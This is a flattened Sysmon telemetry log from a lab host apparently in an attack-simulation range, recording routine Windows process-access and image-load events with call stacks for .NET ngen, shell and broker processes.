14:58:33.716{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC19-607E-6D0E-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:33.685{A7A01FEF-EC19-607E-6C0E-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\148c-0\Microsoft.Office.Tools.Outlook.dll2021-04-20 14:58:33.685 10341000x800000000000000080151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fc6e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3fbe5|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3f049|C:\Windows\System32\modernexecserver.dll+3fd2f|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f6a2|C:\Windows\System32\modernexecserver.dll+3fd1e|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fd0b|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3fdee|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-7805-00000000BB01}4247020C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f400|C:\Windows\System32\modernexecserver.dll+47a8c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000080142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.622{A7A01FEF-C0A6-607E-7805-00000000BB01}4247020C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+478ab|C:\Windows\System32\modernexecserver.dll+476e0|C:\Windows\System32\modernexecserver.dll+4763b|C:\Windows\System32\modernexecserver.dll+3985d|C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll+1781|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x800000000000000080141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.607{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC19-607E-6C0E-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.591{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC19-607E-6C0E-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.591{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC19-607E-6C0E-00000000BB01}5260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.560{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC19-607E-6B0E-00000000BB01}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.560{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000080136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.560{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000080135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.560{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000080134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.560{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000080133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.560{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000080132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.560{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000080131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.560{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000080130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 